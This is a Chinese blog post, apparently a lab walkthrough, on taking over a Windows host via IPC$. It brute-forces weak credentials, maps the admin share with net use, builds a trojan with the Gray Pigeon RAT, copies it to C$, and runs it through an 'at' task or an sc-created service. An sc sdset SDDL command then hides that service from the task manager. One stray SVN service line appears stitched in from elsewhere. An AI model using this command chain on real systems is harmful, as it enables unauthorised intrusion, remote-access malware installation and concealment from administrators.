IPC远程命令

我们首先来扫描目标主机是否存在IPC弱口令(PS:废话,靶机肯定存在了)

命令行下ping靶机IP:10.1.1.2,确认靶机存在。

IPC远程命令插图

 

 

爆破成功后,与目标主机建立IPC net use \\攻击方IP\ipc$ 密码 /user:用户名 用户名密码就是上面暴力破解的。

IPC远程命令插图1
下一步:制作木马
使用:灰鸽子制作木马,将木马生成在D盘。
在这里插入图片描述
下一步:植入木马到目标主机
copy d:server.exe \被攻击方IP\c$\ 建议拷到对方C盘,成功率100%

设置目标主机运行木马(再目标主机中添加计划)
net time \10.1.1.2
at \10.1.1.2 17:17 c:\server.exe

或者通过服务运行

sc create SVNService(服务名) binpath= “J:\Subversion\bin\svnserve.exe(server程序路径) —service -r J:\SVNRep(仓库路径)” start= auto(启动方式) depend= Tcpip(协议)

sc create mrxn binPath=C:/Users/mrxn.net/Desktop/secvery.exe start=auto

& $env:SystemRoot\System32\sc.exe sdset mrxn  "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

运行成功后,在我们的任务管理器里面就看不到创建的 secvery 服务了(需要重启任务管理器或者你命令刷新)

如果你不想隐藏此windows服务了,运行以下安全描述符定义语言(SDDL)命令来取消隐藏即可:

& $env:SystemRoot\System32\sc.exe sdset mrxn "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

 

 

版权声明:
作者:ForDream
链接:https://ishoud.com/index.php/2022/12/27/11563.html
来源:工具人
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
海报
IPC远程命令
我们首先来扫描目标主机是否存在IPC弱口令(PS:废话,靶机肯定存在了) 命令行下ping靶机IP:10.1.1.2,确认靶机存在。     爆破成功后,与……
<<上一篇
下一篇>>